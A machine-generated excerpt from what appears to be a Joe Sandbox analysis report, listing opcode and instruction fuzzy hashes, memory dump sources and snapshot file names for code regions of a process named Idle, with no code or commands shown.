                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d819d2f94384e2138bb157be1f3544612289bf7e297ab99b1622100ced5cf3d4
                                                                                                                    • Instruction ID: 45d76298a0db97efdf859b318a7cf730d26c8086d4cba98ef7f27617917f8eef
                                                                                                                    • Opcode Fuzzy Hash: d819d2f94384e2138bb157be1f3544612289bf7e297ab99b1622100ced5cf3d4
                                                                                                                    • Instruction Fuzzy Hash: 2D412631B19A0D4FE7A4EB58C8A6AF83BE1FF68350F05427AE40DC31E2DD6468014780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 88d93f3d674f7477135c4f32e1e6f8f87f5b4b387928bd5c394a036cb8c1e04a
                                                                                                                    • Instruction ID: 3c8caea23a100d88e2b41d8dceeab899825d842ea2186c0edd61e73243840cb8
                                                                                                                    • Opcode Fuzzy Hash: 88d93f3d674f7477135c4f32e1e6f8f87f5b4b387928bd5c394a036cb8c1e04a
                                                                                                                    • Instruction Fuzzy Hash: 49414812B0D5590AE724F7BCA4A56F97780DF5933AF0806FBE44ECB1EBCD18A841C284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca22a4d5492c3f75c687039d7160beb360d69fefde4f2a90d14953af1b9b8a82
                                                                                                                    • Instruction ID: d80e66af2ff2a6943eba18052f4b6fe8025103c70098ae0a833364b7fb3e21ee
                                                                                                                    • Opcode Fuzzy Hash: ca22a4d5492c3f75c687039d7160beb360d69fefde4f2a90d14953af1b9b8a82
                                                                                                                    • Instruction Fuzzy Hash: 7041C531B1DB198FEB68DB98C8A07F47792EF98350F054279D04ED72D6CA746D468780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 85200c89f334acdae483fa766940965400d5452c18e5152ba32a8dcb68a49e7d
                                                                                                                    • Instruction ID: 906f325f10b1544acb903f24a2121fda0cec9dc17bc3a6d59e934b64e29af689
                                                                                                                    • Opcode Fuzzy Hash: 85200c89f334acdae483fa766940965400d5452c18e5152ba32a8dcb68a49e7d
                                                                                                                    • Instruction Fuzzy Hash: 1F213811B1D94D0FE798B76C88AA6B977C2EF98321F1101B9E40DC32F6DD64AD418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4581c9a670e4d5294f4f72aa8099e619021f216a8caef508dd25ce515cd3afbc
                                                                                                                    • Instruction ID: 64182746838d6b51e8fd7a506dd77ea52e446dc236ec1178965d739c079d3e5e
                                                                                                                    • Opcode Fuzzy Hash: 4581c9a670e4d5294f4f72aa8099e619021f216a8caef508dd25ce515cd3afbc
                                                                                                                    • Instruction Fuzzy Hash: 0131B531A0D68E8FDB56EB64C8649B97FF0EF26300B0905FBC009D71A3DA68A944CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction ID: a0c97c0acc248f613b851f17a3c2fbfb12cd1ed807df1f2eae7a5298642e4f79
                                                                                                                    • Opcode Fuzzy Hash: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction Fuzzy Hash: 63213031F1950D4BFBB4F79884686B862E1FF58310F6241B9D44ED32B6DE786E418708
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cc23a87c6e909b4a80405a6e65b803d135be56b2f60a9b403d209a825ec4ca6
                                                                                                                    • Instruction ID: 1f253f5e5197c7ced883bc0e17c2b4734ac58521d306cb90e1619b391f559f97
                                                                                                                    • Opcode Fuzzy Hash: 9cc23a87c6e909b4a80405a6e65b803d135be56b2f60a9b403d209a825ec4ca6
                                                                                                                    • Instruction Fuzzy Hash: B7210735B0E68D8FE331E7A888511EC7FA0EF42314F1642B7C0508B1D3D97816458745
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 089b3b088153c8441b0f6b55c247d9947650a4ee00762ad6f2159fac12ec67c3
                                                                                                                    • Instruction ID: d90dd4e50a86eba40c8c56b3129ddc4d35ca5d47cf4df15e6e587c5f50600429
                                                                                                                    • Opcode Fuzzy Hash: 089b3b088153c8441b0f6b55c247d9947650a4ee00762ad6f2159fac12ec67c3
                                                                                                                    • Instruction Fuzzy Hash: D211E336B0D6020BC329B75CE8A34E43760DF5123FB0801F3E4498E1A7FD1A6895C285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64f76c37c6d94a60aa285fe5f31b93e8b451407cc0626bc6b6aa781232d8f67f
                                                                                                                    • Instruction ID: 48d1dd968a9b45aca45901871eed7faed0d1b9fc47b3b0e3ab6a9700496440bc
                                                                                                                    • Opcode Fuzzy Hash: 64f76c37c6d94a60aa285fe5f31b93e8b451407cc0626bc6b6aa781232d8f67f
                                                                                                                    • Instruction Fuzzy Hash: 1F016B36B0C5150AE328F7ACB8728F43790DF5433FB0442B7E5498D0E3EC166049C295
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a2f87d0c626f838d226f25e67d38eb35a06b04c650e21669b8fcb89e5396b233
                                                                                                                    • Instruction ID: 2aa8650e4046a187df07f8414a0af36b480aaa1275deee1cd88d911098b24241
                                                                                                                    • Opcode Fuzzy Hash: a2f87d0c626f838d226f25e67d38eb35a06b04c650e21669b8fcb89e5396b233
                                                                                                                    • Instruction Fuzzy Hash: BE11C635A0E78D8FE722EB6888512EC7FB0EF52315F0646F7C084DB1A3D97416498785
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 92e2225eb3235226dd76faa9f251ad4ae8bf195a89450e8154ebc953e96fef45
                                                                                                                    • Instruction ID: 3c633080dc1c9d384688c9dc20e1adead62f1bfa9b53f79d567a8ccae96f8e19
                                                                                                                    • Opcode Fuzzy Hash: 92e2225eb3235226dd76faa9f251ad4ae8bf195a89450e8154ebc953e96fef45
                                                                                                                    • Instruction Fuzzy Hash: D0019E32F05B1A8BEB689B99C4517F9FBE1EF54714F064035E40893294DAAC6E458BC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ef3ab41c462e55a1f5455075161da674efddf89bf5be73d8e88507019232c7f
                                                                                                                    • Instruction ID: efc8d1ee62bc1cd9315f005d7dd07b1c16a90c7a34e47d0a41f2d3556ccd24a8
                                                                                                                    • Opcode Fuzzy Hash: 9ef3ab41c462e55a1f5455075161da674efddf89bf5be73d8e88507019232c7f
                                                                                                                    • Instruction Fuzzy Hash: 4301F731A4A78C4FDB659B7488A94E87FA0EF56200B4640F6D049CB1A2EA299945C300
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: af9daae62a143bbb60ab11d354fbb314001023eaf2a638d038adfeb717d0ee0c
                                                                                                                    • Instruction ID: 023a9a6c559b6d7f65f16fd019e13bc72618b1733347afba2e6056d81b064969
                                                                                                                    • Opcode Fuzzy Hash: af9daae62a143bbb60ab11d354fbb314001023eaf2a638d038adfeb717d0ee0c
                                                                                                                    • Instruction Fuzzy Hash: 2801D622B0D6024BD329B76CE8A38E43750DF1633FB0901F7F4598E1B7ED1AA895C244
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a417c3d9fb18181e5c41b3ed1023d8f84bd59d715dda1c09fb613efe75565291
                                                                                                                    • Instruction ID: f93db00781bd22348742cc4208550ff4ed37fb697949d6b904234c88cec8d296
                                                                                                                    • Opcode Fuzzy Hash: a417c3d9fb18181e5c41b3ed1023d8f84bd59d715dda1c09fb613efe75565291
                                                                                                                    • Instruction Fuzzy Hash: D801A135A0E78C8FE722EB6888642ED7FB0AF42314F0645E7C084DB1A2D97456488B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 58adfa3e4cf8038905d0cfb4cfbafd0a1651bae88f135d521045ec4d122ecfec
                                                                                                                    • Instruction ID: eb94336ed9ffec869ee76df821f1a2c865a0eb4365d9cb8302af876603f1b07c
                                                                                                                    • Opcode Fuzzy Hash: 58adfa3e4cf8038905d0cfb4cfbafd0a1651bae88f135d521045ec4d122ecfec
                                                                                                                    • Instruction Fuzzy Hash: DC014435A5991C8FCB59EB08C8A49E973F1FB68300F11416DD04AD32A1CA34EA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: 59f8fd2efbc150a5d44f100d1a1a2bc09edf15bcecf65a165e36e422e3060799
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: A5F03131A4D50E4BEB74FB94D4546F833A1FB94310F26417DD40ED32B6DDB86A818A08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aaff0950125fc84efde3dfe9d2ebaf0dff806cd582eb8a6756b71a258869588e
                                                                                                                    • Instruction ID: b98fccd0d8eebff63d902f2398e7fa61d992de4464224f0fcc083a80d85286cb
                                                                                                                    • Opcode Fuzzy Hash: aaff0950125fc84efde3dfe9d2ebaf0dff806cd582eb8a6756b71a258869588e
                                                                                                                    • Instruction Fuzzy Hash: 46F0AB3120E64CCFDB41EB3CDCA50E43B50EF43208B4B12FBC088C7562C210184AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9df94f2208747136d1674d705e150cf51176d51cdf3f75b1aae9bd6180041409
                                                                                                                    • Instruction ID: 4430b26e91a70c5c8131641020c4af48e9d1b69953c89250b1d673a4ef5f73f6
                                                                                                                    • Opcode Fuzzy Hash: 9df94f2208747136d1674d705e150cf51176d51cdf3f75b1aae9bd6180041409
                                                                                                                    • Instruction Fuzzy Hash: C5018F34A0E3898FE722EBA488542ADBFB0AF02314F1541E7D484DB1A7D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e7071e9768f307cac85c4e06492b7ac69906dbb1210c331efbe3734c100713da
                                                                                                                    • Instruction ID: d26696a46681e285d400bfd58b341776aed3c857c9dee7354f98390e533c6bd1
                                                                                                                    • Opcode Fuzzy Hash: e7071e9768f307cac85c4e06492b7ac69906dbb1210c331efbe3734c100713da
                                                                                                                    • Instruction Fuzzy Hash: ACE01A06F5FA2F02E57537ED68660FC72104FC4A28FA60172E41C860E6ACCE2685026A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 91584177234e4e94a14b134fd712f47b102e104ad9da032089c314db0102a9c1
                                                                                                                    • Instruction ID: 12af7d8e7e00b200c37f395b303df6c86e9143e3246ac83167012c0307e71d6e
                                                                                                                    • Opcode Fuzzy Hash: 91584177234e4e94a14b134fd712f47b102e104ad9da032089c314db0102a9c1
                                                                                                                    • Instruction Fuzzy Hash: 18E0927060A3844FC71AAA3484A84547F60EF6720134A42EEC045CF2A7EA2DC889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 41bcb8c67603f6e86e3491901f79e8d26f787baddff4f8bb06e15739ddb6171e
                                                                                                                    • Instruction ID: 82832a9fe7b9fb73bca9352dbb02746be3b6e744d9bdf91cecf26dc15e5f160b
                                                                                                                    • Opcode Fuzzy Hash: 41bcb8c67603f6e86e3491901f79e8d26f787baddff4f8bb06e15739ddb6171e
                                                                                                                    • Instruction Fuzzy Hash: FCF08935A0450E8BEB18EB80C894ABD37B1FF90354F01423DD425DB2E9DEB469018740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4ee915f9f62b4f796d342044e96dab82c53d39d201c89cac9edd989eb0d78e4
                                                                                                                    • Instruction ID: 4cf3e01dacb002e208312810da5fecac572d2367263a3dfe30444c495f04800a
                                                                                                                    • Opcode Fuzzy Hash: f4ee915f9f62b4f796d342044e96dab82c53d39d201c89cac9edd989eb0d78e4
                                                                                                                    • Instruction Fuzzy Hash: 86E0ED6164F3C44FCB16AA788868455BF60EE6721174A51EEC146CF2A7EA2D8889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78c483ff6feebfb0c299e5163bae7025a2f7703b781fe34f41d75dc30e43fc08
                                                                                                                    • Instruction ID: ec2f29d60ae6ca7a1cfaa6f3c78dd635607135fe21752415f486db6f69fd6877
                                                                                                                    • Opcode Fuzzy Hash: 78c483ff6feebfb0c299e5163bae7025a2f7703b781fe34f41d75dc30e43fc08
                                                                                                                    • Instruction Fuzzy Hash: A5E04F2165AB844FC74A96388C659503FB0EA6B21178B01D7D045CB1B3E61DCC49C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 20ff7aea408757013e9c377972b8e77ea38e33b7d6ec846ca2a86fd9cf76dfdf
                                                                                                                    • Instruction ID: 63ecd0a9385420bd5adfe6a377be562d57a62751ebd9aca32c52c2d405c92d40
                                                                                                                    • Opcode Fuzzy Hash: 20ff7aea408757013e9c377972b8e77ea38e33b7d6ec846ca2a86fd9cf76dfdf
                                                                                                                    • Instruction Fuzzy Hash: 6BD05E30B10E0D4B8B4CA62D885C470B7D1E7A92067D45269940AC22A1ED65ECC58780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction ID: 05125ca6ac6427422ac393665f971a8b53d443bb6627ba87f2bc28f5714ef969
                                                                                                                    • Opcode Fuzzy Hash: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction Fuzzy Hash: 93D0A730B6190D4B8B0CB63D8858430F3D1F7AA2067D4527DD40BC3291ED65ECC6CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction ID: a7433d85eb501fa178030eda640bf37964b1741df7a66fe575de72c17790bcde
                                                                                                                    • Opcode Fuzzy Hash: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction Fuzzy Hash: 33E04F32B0EC4A87F772A75888605BE3253EFD0361B164735C01DC31E5DEACE7068680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb09a0ce40360abf09e060e5c2c93005aaad2d68c0d6ad047c0d0a67358d0a70
                                                                                                                    • Instruction ID: 556358ff1d978c25e202b9c76064b625ce424a711a9668d4d6528043424ea0b5
                                                                                                                    • Opcode Fuzzy Hash: bb09a0ce40360abf09e060e5c2c93005aaad2d68c0d6ad047c0d0a67358d0a70
                                                                                                                    • Instruction Fuzzy Hash: 55E01A6154E3C44FCB06EB7488698447FA0AE6B21078A40EEC145CF1B3E62D8949C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction ID: a25623b79ca096f107e0ad54c48b633179c52f7cb28cd8cf3f5b0b77629b2038
                                                                                                                    • Opcode Fuzzy Hash: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction Fuzzy Hash: 17E0462294F7C44FC70B9B3588A88943F70AE2721078A40EBC185CF2B3EA298949C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c1e9055ec28956f497693649066c8855fbaf7837a5b5fd45ef6fa6b0b920d71
                                                                                                                    • Instruction ID: 3c0e14c4324ebe22ea75cace0ade2537fd782c95517db62984c46aaadfd3cbc3
                                                                                                                    • Opcode Fuzzy Hash: 3c1e9055ec28956f497693649066c8855fbaf7837a5b5fd45ef6fa6b0b920d71
                                                                                                                    • Instruction Fuzzy Hash: A3E04F2294F7C04FC74B973488B99457F60DE5721074A41EFC085CF1B3DA198949C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
